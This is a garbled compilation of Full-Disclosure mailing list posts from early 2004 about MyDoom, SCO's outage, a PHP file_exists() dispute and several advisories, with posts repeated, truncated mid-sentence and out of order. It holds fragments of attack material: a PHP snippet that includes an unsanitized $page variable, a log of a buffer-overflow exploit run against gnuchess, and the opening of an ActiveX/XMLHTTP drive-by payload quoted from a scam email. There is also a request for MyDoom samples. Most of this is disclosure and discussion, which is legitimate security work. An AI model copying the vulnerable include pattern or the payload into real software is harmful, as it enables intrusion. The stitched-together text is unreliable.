Oh crap.
For the pedantic;
ok ok, wireless networking is out too, ok?
I wrote:
[snip]
The ability of nasties to get from the clean room to machines
on your LAN or the internet should be limited to the capacitance
of thin air. No wires.
___
From http://sco.com/thescogroup/
Security experts are calling Mydoom the largest virus attack ever to
hit the Internet, costing businesses and computer users around the world
in excess of $1 billion in lost productivity and damage, said Darl
McBride
now does that sound a little excessive to
I think it is purely social engineering, there is nothing special about
this malware, it is pretty common now. What it seems to have done
different is that it made Windows users see an icon that looked like a
text file, one that they have been trained to accept as safe
I think that there's a
Hi,
There is a security problem on the file_exists() function who allows
unauthorized users to bypassing the function.
For example, an user use this function for checking the existence and
display the source code of his file my_file.php in the /test
directory.
He use for this a script like
There are various methods for securing file_exists() ...
If you want to secure ... so that's unsecure , is'nt it ?
I didn't say that file_exists() is secure, did I?
I don't think that is critical problem.
If it's not a problem Why you show us a methode to secure ?
I didn't say that it is
On Mon, 2004-02-02 at 03:52, Dean Ashton wrote:
From http://sco.com/thescogroup/
Security experts are calling Mydoom the largest virus attack ever to
hit the Internet, costing businesses and computer users around the world
in excess of $1 billion in lost productivity and damage, said Darl
There are various methods for securing file_exists() ...
If you want to secure ... so that's unsecure , is'nt it ?
I didn't say that file_exists() is secure, did I?
I don't think that is critical problem.
If it's not a problem Why you show us a methode to secure ?
I didn't say that
Product: FirstClass Desktop Client 7.1
Developer: OpenText (+SoftArc/+Centrinity)
URL: http://www.opentext.com
Description: Files with specially crafted names will execute without
displaying a warning prompt, and bypassing administrator file extension
download permissions.
Details:
Files on the
[My apologies if you receive multiple copies of this message]
# #
#DIMVA SUBMISSION DEADLINE EXTENDED#
# #
There are various methods for securing file_exists() ...
If you want to secure ... so that's unsecure , is'nt it ?
I don't think that is critical problem.
If it's not a problem Why you show us a methode to secure ?
I think many programmers don't know this problem exists !
But there is too much
Nourredine Himeur wrote:
There are various methods for securing file_exists() ...
If you want to secure ... so that's unsecure , is'nt it ?
I don't think that is critical problem.
If it's not a problem Why you show us a methode to secure ?
I think many programmers don't know
Hello,
first of all I find it funny that you now report this hole
to full-disclosure. We (at [EMAIL PROTECTED]) got the same
mail (with the same examples/text) from a person with a totally
differen name a while ago.
---
?
Ok I am a bit late into this game, been caught up doing other work in office and skipped through the whole Mydoom experience. I am hoping someone here has a copy of Mydoom A and B. If so, please contact me off-line. THANK YOU
Sam
Do you Yahoo!?
Yahoo! SiteBuilder - Free web site building tool.
On Mon, 02 Feb 2004 08:52:55 GMT, Dean Ashton [EMAIL PROTECTED] said:
“Security experts are calling Mydoom the largest virus attack ever to
hit the Internet, costing businesses and computer users around the world
in excess of $1 billion in lost productivity and damage,” said Darl
McBride
Hi,
It depends of your php configuration... (but it's not a vulnerability so
. i can say you what's the configuration is good ,because firstly nobody
listen me and secondly php-group are blind and deaf)
look this :
http://lists.netsys.com/pipermail/full-disclosure/2004-February/016612.html
...if they spent an average of 30 minutes cleaning the crap out
of their mailboxes...
I'd say they need to consider a better mail client. I mean, really
now...
Michael
___
Full-Disclosure - We believe in it.
Charter:
they have moved to
www.thescogroup.com
Here is their Partner Alert from Monday AM ;-)
From - Mon Feb 2 10:00:48 2004
X-UIDL: -==-=-=-=-=-=-=-=-=-=-=-
X-Mozilla-Status: 0001
X-Mozilla-Status2:
Return-Path: [EMAIL PROTECTED]
Received: from om-thescogroup.rgc3.net ([66.35.244.29])
Hi,
Nourredine Himeur [EMAIL PROTECTED] wrote:
In the same directory :
test.php
---
?
if(file_exists($page)){
echo(Sorry the local page is protected);
}else{
include($page);
}
?
Hello computer virus hunter, [1]
Ok I am a bit late into this game, been caught up doing other work in
office
and skipped through the whole Mydoom experience. I am hoping someone
here has a copy of Mydoom A and B. If so, please contact me off-line.
THANK YOU
I've just added your email address
Here is a copy of an interesting Eric Gauthier's paper about
man-in-the-middle using Bluetooth in a WLAN internetworking environment.
http://developers.of.pl/papers/mirror/S3.xxxOr-BT-attack.zip
Cheers,
--
Lukasz Luzar
http://Developers.of.PL/
Crede quod habes, et habes
[[
Initially, SCO was DoS'd. Then they removed the DNS entry. In any event, all
but one of the menu links I checked on http://sco.com point to www.sco.com.
SCO has also created a new domain, www.thescogroup.com. The link problem
persists, pointing to www.sco.com. (Note that I did not check all of
But all bugs aren't a vulnerability.
I don't thinks , for me , all bugs ARE a vulnerability.
You show only my example but imagine you want to verifie if do this :
http://www.security-challenge.com/123456/outils/source.php
traduct:
Lire une source HTML = Read a HTML source
source.php:
Hello,
file_exists() has a bug, yes. It should indicate whether a file exists or
not and you demonstrated that it doesn't in a special case. But all bugs
aren't a vulnerability.
The mistake is in the code you supplied. I'm not the first to tell it. You
told that the code is only an example,
:-) [EMAIL PROTECTED] said:
Ok I am a bit late into this game, been caught up doing other work in
office and skipped through the whole Mydoom experience. I am hoping
someone here has a copy of Mydoom A and B. If so, please contact me
off-line.
THANK YOU
You want MyDoom? I just got 5
On Mon, 02 Feb 2004 08:37:04 CST, michael williamson [EMAIL PROTECTED] said:
...if they spent an average of 30 minutes cleaning the crap out
of their mailboxes...
I'd say they need to consider a better mail client. I mean, really
now...
I said cleaning them out, waiting for important
On Mon, 02 Feb 2004 06:35:35 -0500 Roy M. Silvernail wrote:On Mon, 2004-02-02 at 03:52, Dean Ashton wrote: From http://sco.com/thescogroup/ “Security experts are calling Mydoom the largest virus attack ever to hit the Internet, costing businesses and computer users around the world in excess of
And this in the same press release -
In addition, the company is including links that point visitors to
security vendors, including Network Associates and Symantec, that will
provide them with all of the latest information on how to download
software updates and protect their PCs against the
how is this even RELATED to full-disclosure??? man u might as well talk bout
the sco and microsoft dos, its going along the same dribble.
- Original Message -
From: Nourredine Himeur [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Monday, February 02, 2004 11:58 PM
Nourredine Himeur wrote:
But all bugs aren't a vulnerability.
I don't thinks , for me , all bugs ARE a vulnerability.
Your personal opinion doesn't matter, facts do.
traduct:
Lire une source HTML = Read a HTML source
source.php:
On 02.02.2004 at 14:00:17, Robert Guess [EMAIL PROTECTED] wrote:
I don't
feel sorry for SCO but I cannot see any way for this virus to benefit
the open source or free software communities.
What if someone exactly wants to archive this?
In the current situation with SCO vs. IBM it would
hey what do ya know it works :-/
(slack 9.1)
[EMAIL PROTECTED]:/HDB/mycode/ex$ ./ex_bof
Please enter the values as requested . . .
Enter the vulnerable program path: /usr/bin/gnuchess
Enter the vulnerable program name: gnuchess
Enter any arguments the program requires: -s
Enter an offset: 0
Enter
:-\) [EMAIL PROTECTED] wrote:
Ok I am a bit late into this game, been caught up doing other work in
office and skipped through the whole Mydoom experience. I am hoping
someone here has a copy of Mydoom A and B. If so, please contact me
off-line. THANK YOU
Oh good, so another lamer can
Nick FitzGerald wrote:
:-\) [EMAIL PROTECTED] wrote:
Ok I am a bit late into this game, been caught up doing other work in
office and skipped through the whole Mydoom experience. I am hoping
someone here has a copy of Mydoom A and B. If so, please contact me
off-line. THANK YOU
Oh good, so
Hallo Jim,
* Jim Race [EMAIL PROTECTED] [2004-02-02 14:55]:
Looks like caldera.com and calderasystems.com are dead as well.
the ftp servers too, because they all point to the same address.
regards nico
--
Nico Golde nico at ngolde dot de
public key available on:
http://www.ngolde.de/gpg.html
Strange that MS released a security patch today and not on the schedule
as promised? Any speculation as to why?
Title: Microsoft Windows Security Bulletin Summary for
February 2004
Issued: February 2, 2004
Version Number:
They finally have a fix for the url spoofing problem (%00) and updated a
previous IE roll up to cover it. I have seen reference to this bug
being used in the wild already, which meets Microsoft's out of cycle
release criteria.
Mike Wronski wrote:
Strange that MS released a security patch
Nick FitzGerald [EMAIL PROTECTED] wrote:
:-\) [EMAIL PROTECTED] wrote:
Ok I am a bit late into this game, been caught up doing other work in
office and skipped through the whole Mydoom experience. I am hoping
someone here has a copy of Mydoom A and B. If so, please contact me
off-line.
From: Chris [EMAIL PROTECTED]:
hey what do ya know it works :-/
Checkmate!
_
High-speed usersbe more efficient online with the new MSN Premium Internet
Software. http://join.msn.com/?pgmarket=en-uspage=byoa/premST=1
Hi all
ad nauseum
I believe it is full disclosure, but not the local virus code
repository. There is a HUGE (no really, it is HUGE) difference between
'full-disclosure', where the nitty gritty details of a bug/exploit/hole
is described and making available executable malware (read: virus/worm).
On Mon, 02 Feb 2004 11:57:14 EST, Lennart Damm [EMAIL PROTECTED] said:
The MyDoom author should be an asset to any security company fighting this
kind of attacks. Or maybe he already is. I would not hesitate employing him to
do the analysis and synthesis of the obvious 3G vulnerabilities
They finally have a fix for the url spoofing problem (%00)
and updated a
previous IE roll up to cover it. I have seen reference to this bug
being used in the wild already, which meets Microsoft's out of cycle
release criteria.
it also seems to have fixed the damn annoying scrolling bug.
Has anyone see this little code injection hack.
Is this old?
Email has subject line congranulations! you won $1169
with body
http://sinaraevent.com/bbs/zipcode/6.htm
and code
textarea id=code style=display:none;
var x = new ActiveXObject(Microsoft.XMLHTTP);
x.Open(GET,
On Tue, 2004-02-03 at 14:40, axid3j1al axid3j1al wrote:
Has anyone see this little code injection hack.
Is this old?
According to Trend AV, this is JS_PETCH.A, first discovered 6-Nov-2003.
Cheers
Steffen.
___
Full-Disclosure - We believe in it.
Announced: 2004-02-02
Type: Denial of Service Attack on Windows
Impact: smbmount can stop Windows from sharing files
Writer: Daniel Kabs, Germany ([EMAIL PROTECTED])
Credits: Thanks to Steve Ladjabi ([EMAIL PROTECTED])
Contents:
1. Abstract
2. Affected Systems
3. Attack Setup
4. Symptoms
5.
if you look at the symbols from that exe, they are look dodge.
RegQueryValueExA
ShellExecuteA
4FtpPutFileA
also appears to have a base64 payload inside it. and i only used strings for
that its to hot to do any real work ..
- Original Message -
From: axid3j1al axid3j1al [EMAIL
On Mon, 02 Feb 2004 22:56:24 CST, James Bliss [EMAIL PROTECTED] said:
I have a question, has anyone documented the number, volume, any metrics of
the number of packets actually going to sco.com? Possibly the source IPs as
well to see if it is scattered or centralized on a few boxes.
Gonna
hrm i got this bounce back from hotmail when i emailed back
Attachment Details:-
Attachment Name: N/A
File: Infected.msg
Infected? Yes
Repaired? No
Blocked? No
Deleted? No
Virus Name: VBS/Psyme
^^^ theres your virus name apartly..., even tho i scanned it with sweep
(sophos) and it didnt pick ne
In the current situation with SCO vs. IBM it would be easy for SCO to
release a virus against themselves and blaim it on the open source
community. Wouldn't even surprise me. And a not knoledgable judge would
even recognize it as evidence against the Open Source community.
Nah, a little too
On Monday 02 February 2004 23:24, [EMAIL PROTECTED] wrote:
On Mon, 02 Feb 2004 22:56:24 CST, James Bliss [EMAIL PROTECTED]
said:
I have a question, has anyone documented the number, volume, any metrics
of the number of packets actually going to sco.com? Possibly the source
IPs as well to
I was running tcpdump tailing the firewall and am
curious about something. I am receiving alot of udp
packets going to port 809, I'm not really worried
about an exploit as they are being dropped, but does
anyone know what is doing this ?
__
Do you Yahoo!?
Yahoo!
How do I delete the virus that is not detectable by norton av (latest
definitions)
but has the files
c:\windows\system32\f~q\fag.exe
c:\windows\system32\f~q\usr_crt.dll
i.e. what program do I kill to do a attrib -h -r -s *.* ; del. ?
thanks
51 matches
Mail list logo